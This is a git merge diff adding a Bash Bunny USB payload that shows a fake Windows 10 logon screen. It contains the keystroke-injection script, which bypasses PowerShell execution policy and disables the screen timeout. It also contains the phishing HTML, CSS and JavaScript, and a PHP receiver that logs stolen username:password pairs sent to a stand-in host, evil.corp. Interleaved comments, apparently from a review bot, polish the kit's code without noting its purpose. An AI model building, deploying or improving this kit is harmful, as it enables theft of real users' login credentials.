Merge branch 'hak5:master' into master
@ -0,0 +1,66 @@
|
||||||
|
# "Microsoft Windows 10" Fake Logon Screen
|
||||||
|
|
||||||
|
- Title: "Microsoft Windows 10" Fake Logon Screen
|
||||||
|
- Author: TW-D
|
||||||
|
- Version: 1.0
|
||||||
|
- Target: Microsoft Windows 10
|
||||||
|
- Category: Phishing
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
3) Retrieve the current username.
|
||||||
|
4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||||
|
5) The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||||
|
6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
From "payload.txt" change the values of the following constants :
|
||||||
|
```bash
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly BB_LABEL="BashBunny"
|
||||||
|
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
|
||||||
|
readonly INPUT_PLACEHOLDER="Password"
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Example of code for the data receiver :
|
||||||
|
```php
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if (
|
||||||
|
$_SERVER['REQUEST_METHOD'] === 'POST' &&
|
||||||
|
isset($_POST['username']) && !empty($_POST['username']) &&
|
||||||
|
isset($_POST['password']) && !empty($_POST['password'])
|
||||||
|
) {
|
||||||
|
|
||||||
|
$remote_addr = (string) $_SERVER['REMOTE_ADDR'];
|
||||||
|
$user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
|
||||||
|
$username = (string) $_POST['username'];
|
||||||
|
$password = (string) $_POST['password'];
|
||||||
|
|
||||||
|
/*
|
||||||
|
touch ./aGFrNQ_loot.log
|
||||||
|
chown www-data:www-data ./aGFrNQ_loot.log
|
||||||
|
*/
|
||||||
|
$loot = fopen('aGFrNQ_loot.log', 'a');
|
||||||
|
fwrite($loot, "##\n");
|
||||||
|
fwrite($loot, $remote_addr . "\n");
|
||||||
|
fwrite($loot, $user_agent . "\n");
|
||||||
|
fwrite($loot, $username . ':' . $password . "\n");
|
||||||
|
fwrite($loot, "##\n");
|
||||||
|
fclose($loot);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
http_response_code(302);
|
||||||
|
header('Location: https://hak5.org/');
|
||||||
|
exit;
|
||||||
|
|
||||||
|
?>
|
||||||
|
```
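Review bot: In the PHP receiver example, `$_SERVER['HTTP_USER_AGENT']` is read without a guard, so a request that omits the User-Agent header raises an "undefined index" notice before the `(string)` cast runs; reading it as `$_SERVER['HTTP_USER_AGENT'] ?? ''` (PHP 7+) avoids that. The surrounding condition `isset($_POST['username']) && !empty($_POST['username'])` is also redundant, since `!empty()` already yields false for an unset key, so `!empty($_POST['username']) && !empty($_POST['password'])` says the same thing. Separately, the README's Description omits two facts that only payload.txt's header records — the "single screen" assumption and the Windows 10 20H2 / PowerShell 5.1 builds it was tested on — and carrying them into this page would keep the two documents in sync.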
|
|
@ -0,0 +1,121 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: "Microsoft Windows 10" Fake Logon Screen
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# 1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
# 2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
# 3) Retrieve the current username.
|
||||||
|
# 4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||||
|
# 5) The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||||
|
# 6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
|
||||||
|
#
|
||||||
|
# Author: TW-D
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Phishing
|
||||||
|
# Target: Microsoft Windows 10
|
||||||
|
# Attackmodes: HID and STORAGE
|
||||||
|
#
|
||||||
|
# TESTED ON
|
||||||
|
# ===============
|
||||||
|
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||||
|
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||||
|
#
|
||||||
|
# NOTE
|
||||||
|
# ===============
|
||||||
|
# Target computer with a single screen.
|
||||||
|
#
|
||||||
|
# STATUS
|
||||||
|
# ===============
|
||||||
|
# Magenta solid ................................... SETUP
|
||||||
|
# Yellow single blink ............................. ATTACK
|
||||||
|
# Yellow double blink ............................. STAGE2
|
||||||
|
# Yellow triple blink ............................. STAGE3
|
||||||
|
# Yellow quadruple blink .......................... STAGE4
|
||||||
|
# White fast blink ................................ CLEANUP
|
||||||
|
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||||
|
#
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
|
||||||
|
readonly BB_LABEL="BashBunny"
|
||||||
|
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
|
||||||
|
readonly INPUT_PLACEHOLDER="Password"
|
||||||
|
|
||||||
|
######## SETUP ########
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
|
||||||
|
######## ATTACK ########
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
Q DELAY 8000
|
||||||
|
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||||
|
Q DELAY 8000
|
||||||
|
|
||||||
|
LED STAGE2
|
||||||
|
|
||||||
|
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 3500
|
||||||
|
Q STRING "CD \"\${BB_VOLUME}\""
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
LED STAGE3
|
||||||
|
|
||||||
|
# Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
#
|
||||||
|
Q STRING "(powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
# Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||||
|
#
|
||||||
|
Q STRING "(powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
# Retrieve the current username.
|
||||||
|
#
|
||||||
|
Q STRING "\"const CURRENT_USERNAME = '\$([Environment]::UserName)';\" | Out-File -FilePath ./TMP.js"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "\"const DROP_URL = '${DROP_URL}';\" | Out-File -FilePath ./TMP.js -Append"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
Q STRING "\"const INPUT_PLACEHOLDER = '${INPUT_PLACEHOLDER}';\" | Out-File -FilePath ./TMP.js -Append"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1500
|
||||||
|
|
||||||
|
LED STAGE4
|
||||||
|
|
||||||
|
# Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||||
|
#
|
||||||
|
Q STRING "(Invoke-Expression .\\phishing_files\\index.html); exit"
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 9000
|
||||||
|
Q TAB
|
||||||
|
Q DELAY 2000
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 2000
|
||||||
|
|
||||||
|
######## CLEANUP ########
|
||||||
|
|
||||||
|
LED CLEANUP
|
||||||
|
|
||||||
|
sync
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
|
|
||||||
|
# The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||||
|
#
|
||||||
|
shutdown -h 0
|
|
@ -0,0 +1,16 @@
|
||||||
|
body {
|
||||||
|
min-height: 100vh;
|
||||||
|
background-size: cover;
|
||||||
|
background-repeat: no-repeat;
|
||||||
|
background-position-x: center;
|
||||||
|
background-position-y: center;
|
||||||
|
}
|
||||||
|
|
||||||
|
.login {
|
||||||
|
min-width: 42px;
|
||||||
|
background-image: url("./../img/submit.png");
|
||||||
|
background-size: cover;
|
||||||
|
background-repeat: no-repeat;
|
||||||
|
background-position-x: center;
|
||||||
|
background-position-y: center;
|
||||||
|
}
|
|
@ -0,0 +1,13 @@
|
||||||
|
@font-face {
|
||||||
|
font-family: "text-security-disc";
|
||||||
|
src: url("./../font/text-security-disc.ttf") format("truetype");
|
||||||
|
}
|
||||||
|
|
||||||
|
body, .password::placeholder {
|
||||||
|
font-family: "Segoe UI";
|
||||||
|
font-weight: lighter;
|
||||||
|
}
|
||||||
|
|
||||||
|
.password {
|
||||||
|
font-family: "text-security-disc";
|
||||||
|
}
|
|
@ -0,0 +1,4 @@
|
||||||
|
document.querySelector('div#username').innerText = CURRENT_USERNAME;
|
||||||
|
document.querySelector('#drop').action = DROP_URL;
|
||||||
|
document.querySelector('input#username').value = CURRENT_USERNAME;
|
||||||
|
document.querySelector('.password').placeholder = INPUT_PLACEHOLDER;
|
|
@ -0,0 +1,9 @@
|
||||||
|
function fullscreen() {
|
||||||
|
let document_element;
|
||||||
|
document_element = document.documentElement;
|
||||||
|
document.querySelector('#fullscreen').style.display = "none";
|
||||||
|
if (document_element.requestFullscreen) {
|
||||||
|
document_element.requestFullscreen();
|
||||||
|
document.querySelector('.password').focus();
|
||||||
|
}
|
||||||
|
}
|
|
@ -0,0 +1,9 @@
|
||||||
|
const WALLPAPERS = [
|
||||||
|
'abstact-nature.jpg',
|
||||||
|
'beach-cave.jpg',
|
||||||
|
'mountains-lake.png',
|
||||||
|
'sea-airplain.png',
|
||||||
|
'solid-blue.jpg',
|
||||||
|
'windows-light.jpg'
|
||||||
|
];
|
||||||
|
document.querySelector('body').style.backgroundImage = ('url("./assets/img/wallpapers/' + (WALLPAPERS.sort(() => Math.random() - 0.5)[0]) + '")');
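Review bot: `WALLPAPERS.sort(() => Math.random() - 0.5)` is not a uniform shuffle — an inconsistent comparator makes the resulting order engine-dependent and biased — and it mutates the `const` array in place on every load. A direct index pick is uniform and leaves the array untouched: `const wallpaper = WALLPAPERS[Math.floor(Math.random() * WALLPAPERS.length)];` followed by `document.querySelector('body').style.backgroundImage = 'url("./assets/img/wallpapers/' + wallpaper + '")';`. A one-line comment such as `// Pick one wallpaper at random per page load` would also make the intent obvious to the next reader.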
|
|
@ -0,0 +1,7 @@
|
||||||
|
window.addEventListener(
|
||||||
|
'contextmenu',
|
||||||
|
function(e) {
|
||||||
|
e.preventDefault();
|
||||||
|
},
|
||||||
|
false
|
||||||
|
);
|
|
@ -0,0 +1,47 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8" />
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1" />
|
||||||
|
<link rel="stylesheet" type="text/css" href="./assets/css/backgrounds.css?v=1.0.0" />
|
||||||
|
<link rel="stylesheet" type="text/css" href="./assets/css/fonts.css?v=1.0.0" />
|
||||||
|
<link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?v=5.1.3" />
|
||||||
|
<title></title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<main class="container-fluid">
|
||||||
|
<section class="row">
|
||||||
|
<div class="col-3" style="min-height: 100vh;">
|
||||||
|
<button id="fullscreen" onclick="fullscreen();">fullscreen</button>
|
||||||
|
</div>
|
||||||
|
<div class="col-6 align-self-center text-center">
|
||||||
|
<img class="img-fluid opacity-75" src="./assets/img/user.png" title="" />
|
||||||
|
<div class="h2 my-3 text-white" id="username">User</div>
|
||||||
|
<div class="row">
|
||||||
|
<div class="col-6 offset-3">
|
||||||
|
<form method="POST" id="drop">
|
||||||
|
<div class="input-group">
|
||||||
|
<input class="d-none" id="username" type="text" name="username" />
|
||||||
|
<input class="form-control password" type="text" name="password" autocomplete="off" placeholder="Password" required />
|
||||||
|
<button class="btn opacity-75 login" type="submit"></button>
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="col-3" style="min-height: 100vh;">
|
||||||
|
<div class="position-absolute bottom-0 end-0">
|
||||||
|
<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/worldwide.png" title="" />
|
||||||
|
<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/network.png" title="" />
|
||||||
|
<img class="img-fluid ms-2 me-3 my-3" style="width: 45px;" src="./assets/img/icons/power.png" title="" />
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</main>
|
||||||
|
<script type="text/javascript" src="./../TMP.js"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/fullscreen.js?v=1.0.0"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/rightclick.js?v=1.0.0"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/randomwall.js?v=1.0.0"></script>
|
||||||
|
<script type="text/javascript" src="./assets/js/dispatch.js?v=1.0.0"></script>
|
||||||
|
</body>
|
||||||
|
</html>
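Review bot: `id="username"` is used twice in this file, on the `<div class="h2 my-3 text-white" id="username">` and again on the hidden `<input class="d-none" id="username" ...>`; duplicate ids are invalid HTML, and dispatch.js only works because it disambiguates with the tag-qualified selectors `div#username` and `input#username`. Renaming the input, e.g. `<input class="d-none" id="username-field" type="text" name="username" />`, and updating the selector in dispatch.js to `document.querySelector('input#username-field').value = CURRENT_USERNAME;` removes the ambiguity without changing the form's submitted field name. The `name="username"` attribute, which is what the POST actually carries, stays as is.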
|
|
@ -6,7 +6,7 @@
|
||||||
# Target: Windows 7
|
# Target: Windows 7
|
||||||
# Attackmodes: HID
|
# Attackmodes: HID
|
||||||
|
|
||||||
ATTACMODE HID
|
ATTACKMODE HID
|
||||||
|
|
||||||
###### OPTIONS #######
|
###### OPTIONS #######
|
||||||
|
|
||||||
|
|